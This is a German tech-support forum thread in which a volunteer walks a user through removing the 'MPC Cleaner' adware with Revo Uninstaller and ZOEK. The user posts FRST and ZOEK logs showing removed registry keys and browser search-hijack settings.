C:\temp 2016-03-29 18:11 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\rescache 2016-03-29 12:51 - 2012-07-26 09:59 - 00000000 ____D C:\WINDOWS\CbsTemp 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\system32\GWX 2016-03-28 23:29 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\AppReadiness 2016-03-28 23:13 - 2013-09-07 18:10 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD 2016-03-28 23:10 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator 2016-03-22 03:13 - 2014-12-25 19:50 - 00000000 ____D C:\WINDOWS\system32\appraiser 2016-03-22 03:12 - 2013-09-09 14:33 - 00000000 ____D C:\WINDOWS\system32\MRT 2016-03-22 03:08 - 2013-09-09 14:33 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2016-03-22 00:21 - 2014-05-14 21:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2016-03-21 23:32 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps 2016-03-21 23:18 - 2014-03-22 21:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome 2016-03-21 23:15 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\System 2016-03-21 22:57 - 2016-01-28 10:48 - 00000000 ____D C:\Users\Denny\AppData\Local\CrashDumps 2016-03-21 22:22 - 2015-06-01 20:54 - 00000000 ____D C:\Program Files (x86)\Color Icons for Gmail 2016-03-21 18:50 - 2015-10-26 21:57 - 00000000 ____D C:\WINDOWS\Minidump 2016-03-21 18:16 - 2016-01-28 10:50 - 00000000 ____D C:\Users\Denny\AppData\Local\Tempfolder 2016-03-21 17:36 - 2013-08-22 16:44 - 00590976 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2016-03-21 17:17 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\FxsTmp 2016-03-21 16:11 - 2016-01-18 20:30 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2016-03-21 16:11 - 2016-01-18 20:30 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-03-11 09:50 - 2013-09-15 13:17 - 00000000 ____D C:\Users\Denny\Documents\Rechnungen DS-KFZ 2016-03-09 18:38 - 2013-08-22 17:36 - 00000000 ___RD C:\WINDOWS\ToastData 2016-03-09 09:37 - 2013-09-30 05:59 - 00000000 ____D C:\Program Files\Windows Journal 2016-03-08 12:35 - 2016-02-05 00:36 - 00000000 ____D C:\Users\Denny\AppData\Local\Chromium 2016-03-08 12:08 - 2013-11-10 15:12 - 00267264 ___SH C:\Users\Denny\Desktop\Thumbs.db 2016-03-08 12:04 - 2013-10-24 13:25 - 00000000 ___DC C:\WINDOWS\Panther 2016-03-07 21:43 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\NDF ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2013-06-29 02:24 - 2013-06-29 02:24 - 0000000 ____H () C:\ProgramData\DP45977C.lfl 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLes.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLet.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLev.DAT Einige Dateien in TEMP: ==================== C:\Users\Denny\AppData\Local\Temp\avgnt.exe C:\Users\Denny\AppData\Local\Temp\libeay32.dll C:\Users\Denny\AppData\Local\Temp\msvcr120.dll C:\Users\Denny\AppData\Local\Temp\sqlite3.dll ==================== Bamital & volsnap ================= (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert C:\WINDOWS\explorer.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert C:\WINDOWS\system32\services.exe => Datei ist digital signiert C:\WINDOWS\system32\User32.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert LastRegBack: 2016-03-29 18:02 ==================== Ende von FRST.txt ============================ Malwarebytes hat 0 Dateien in die Quarantäne verschoben, obwohl über 200 Funde aufgetreten sind. Geändert von pitu82 (29.03.2016 um 18:37 Uhr) |
|
30.03.2016, 00:57
| #7 |
| /// Malwareteam | MPC Cleaner lässt sich nicht löschen (Maleware) Schritt: 1 Schadsoftware hat deinen Chrome Browser irreparabel korrumpiert. Lade Dir bitte von hier  Revo Uninstaller (alternativ portable Revo Uninstaller) herunter.
Achtung: Wenn deine Daten nicht über einen Google Account synchronisiert sind, sichere vorher deine Lesezeichen und Passwörter wenn nötig! Danach neu runterladen, direkt nach der Installation zurücksetzen. Jetzt kannst du Chrome wieder normal benutzen. Schritt: 2 Download von  ZOEK (by Smeenk)
Schritt: 3 Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen. Hast du noch irgendwelche Probleme mit deinem Rechner?
__________________ Mfg, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Unterstütze uns mit einer Spende ......... Lob, Kritik oder Wünsche ......... .......... Folge uns auf Facebook .......... |
|
30.03.2016, 13:56
| #8 |
| | MPC Cleaner lässt sich nicht löschen (Maleware) Weitere Probleme habe ich eigentlich nicht, danke. Allerdings überlege ich gerade, ob ich den Prozess mit Chrome auch mit Firefox und Explorer durchführen sollte? Chrome habe ich auch nicht mehr installiert, da ich eigentlich nur die anderen beiden verwende. Also Firefox und Explorer auch mit Revo deinstallieren und dann neu installieren? Hier noch die Ergebnisse: zoek: Code:
ATTFilter Zoek.exe v5.0.0.1 Updated 31-December-2015
Tool run by Denny on 30.03.2016 at 12:59:49,48.
Microsoft Windows 8.1 6.3.9600 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\Denny\Downloads\zoek.exe [Scan all users] [Script inserted]
==== System Restore Info ======================
30.03.2016 13:01:35 Zoek.exe System Restore Point Created Successfully.
==== Empty Folders Check ======================
C:\PROGRA~3\Freemake deleted successfully
C:\PROGRA~3\{FE8D473A-6F06-4F99-B5F4-BED72B2A038C} deleted successfully
C:\Users\Denny\AppData\Local\EmieBrowserModeList deleted successfully
C:\Users\Denny\AppData\Local\EmieSiteList deleted successfully
C:\Users\Denny\AppData\Local\EmieUserList deleted successfully
C:\Users\Denny\AppData\Local\Nikon deleted successfully
C:\Users\Denny\AppData\Local\VirtualStore deleted successfully
==== Deleting CLSID Registry Keys ======================
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{11DA220F-A26C-45FE-B34-702230168E14} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{11DA220F-A26C-45FE-B34-702230168E14} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{11DA220F-A26C-45FE-B34-702230168E14} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12A9715F-1374-4705-B25E-29DC956A50D} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12A9715F-1374-4705-B25E-29DC956A50D} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12A9715F-1374-4705-B25E-29DC956A50D} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1AF180E5-6C8B-4315-B627-A69D1F81CFC} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1AF180E5-6C8B-4315-B627-A69D1F81CFC} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1AF180E5-6C8B-4315-B627-A69D1F81CFC} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F945903-D8EA-4AC9-864-058CE661FAD} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F945903-D8EA-4AC9-864-058CE661FAD} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F945903-D8EA-4AC9-864-058CE661FAD} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2F0EE67A-CF37-4AAB-8382-D1CBD493C4A} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2F0EE67A-CF37-4AAB-8382-D1CBD493C4A} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2F0EE67A-CF37-4AAB-8382-D1CBD493C4A} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{30472B66-664C-4260-90F9-5586D343EC3} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{30472B66-664C-4260-90F9-5586D343EC3} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{30472B66-664C-4260-90F9-5586D343EC3} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3F512EE1-FA3D-465E-B4BD-8DA35C3A6A3D} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3F512EE1-FA3D-465E-B4BD-8DA35C3A6A3D} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3F512EE1-FA3D-465E-B4BD-8DA35C3A6A3D} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ACAC2AF-D14F-4536-9682-8FD09771FEA} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ACAC2AF-D14F-4536-9682-8FD09771FEA} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ACAC2AF-D14F-4536-9682-8FD09771FEA} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4D672C46-B192-4945-BD94-E1A3997A3AE} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4D672C46-B192-4945-BD94-E1A3997A3AE} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4D672C46-B192-4945-BD94-E1A3997A3AE} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5480CDFD-8128-4A10-8FC7-2765B9B9852} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5480CDFD-8128-4A10-8FC7-2765B9B9852} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5480CDFD-8128-4A10-8FC7-2765B9B9852} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5A1CD7A0-9FAC-4C17-B74B-A87A529A3CC} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5A1CD7A0-9FAC-4C17-B74B-A87A529A3CC} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5A1CD7A0-9FAC-4C17-B74B-A87A529A3CC} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{713CEEB0-E88B-4A90-8E25-1F3332A09DCA} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{713CEEB0-E88B-4A90-8E25-1F3332A09DCA} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{713CEEB0-E88B-4A90-8E25-1F3332A09DCA} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73EBB32-C5B0-442D-9D9F-80D7B81FFE1} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73EBB32-C5B0-442D-9D9F-80D7B81FFE1} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73EBB32-C5B0-442D-9D9F-80D7B81FFE1} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73F7DFB-DD48-4943-BD29-B31E45F2CE96} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73F7DFB-DD48-4943-BD29-B31E45F2CE96} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73F7DFB-DD48-4943-BD29-B31E45F2CE96} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B1FC636A-B4B2-4513-88E6-2873DF841080} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B1FC636A-B4B2-4513-88E6-2873DF841080} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B1FC636A-B4B2-4513-88E6-2873DF841080} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B22212E4-D0DB-4BA0-883A-CD20A58A4F4D} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B22212E4-D0DB-4BA0-883A-CD20A58A4F4D} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B22212E4-D0DB-4BA0-883A-CD20A58A4F4D} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B3A44C67-59B5-484E-AFD3-F014C5EA9E65} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B3A44C67-59B5-484E-AFD3-F014C5EA9E65} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B3A44C67-59B5-484E-AFD3-F014C5EA9E65} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C2E77B43-BFD5-41B9-B83E-10928C31F3A} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C2E77B43-BFD5-41B9-B83E-10928C31F3A} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C2E77B43-BFD5-41B9-B83E-10928C31F3A} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E24B5C79-BEE0-4262-8CD6-7DED5A7AE86} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E24B5C79-BEE0-4262-8CD6-7DED5A7AE86} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E24B5C79-BEE0-4262-8CD6-7DED5A7AE86} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E5290162-27D7-4994-88E7-CE2BB166381} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E5290162-27D7-4994-88E7-CE2BB166381} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E5290162-27D7-4994-88E7-CE2BB166381} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E7DDB36D-9A41-43EB-8521-5D68E3B8BE29} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E7DDB36D-9A41-43EB-8521-5D68E3B8BE29} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E7DDB36D-9A41-43EB-8521-5D68E3B8BE29} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F99A4769-6E7E-4BB2-88ED-81B46B2767BB} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F99A4769-6E7E-4BB2-88ED-81B46B2767BB} deleted successfully
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F99A4769-6E7E-4BB2-88ED-81B46B2767BB} deleted successfully
HKEY_CLASSES_ROOT\CLSID\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE} deleted successfully
HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE} deleted successfully
==== Deleting CLSID Registry Values ======================
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully
HKEY_USERS\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully
HKEY_USERS\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully
HKEY_USERS\S-1-5-19\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully
HKEY_USERS\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully
HKEY_USERS\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully
HKEY_USERS\S-1-5-20\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully
HKEY_USERS\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully
HKEY_USERS\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Approved Extensions\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744} deleted successfully
==== Deleting Services ======================
==== FireFox Fix ======================
Deleted from C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js:
user_pref("browser.startup.homepage", "hxxp://www.google.de/");
user_pref("browser.search.useDBForOrder", false);
Added to C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
Deleted from C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js:
user_pref("browser.startup.homepage", "https://www.malwarebytes.org/restorebrowser//?ts=AHEpBnAsAHQpAk..&v=20160301&uid=A460F8ADD5C00C48BC17A830416D08D5&ptid=sqr1&mode=ffseng");
user_pref("browser.search.defaultenginename", "yessearches");
user_pref("browser.search.selectedEngine", "yessearches");
user_pref("browser.search.useDBForOrder", false);
Added to C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\prefs.js:
Deleted from C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\prefs.js:
user_pref("browser.search.useDBForOrder", false);
Added to C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\pyl6c8aa.default\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");
ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
user.js not found
---- Lines webget removed from prefs.js ----
user_pref("extensions.webget.asul", "1400531425838");
user_pref("extensions.webget.aul", "1400530028243");
user_pref("extensions.webget.irl", true);
user_pref("extensions.webget.is", "isgi1whDE");
user_pref("extensions.webget.ug", "19739959-F219-4984-864D-0CB6FC4D1F41");
---- Lines {21EAF666-26B3-4a3c-ABD0-CA2F5A326744} removed from prefs.js ----
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.extensionFirstRun", false);
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.lastExtensionVersion", "2.0.0.440");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_install_time", "19-05-2014");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_product_name", "V-bates");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_product_version", "2.0.0.440");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_temp_version", "2.0.0.440|||8641400531305203");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.ScriptData_toolbarID", "dc73c26d8e6b4a77a3e092975238ebb7");
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setdefaultsearch_2.0.0.440", false);
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.setdnscatch_2.0.0.440", false);
user_pref("{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}.sethomepage_2.0.0.440", false);
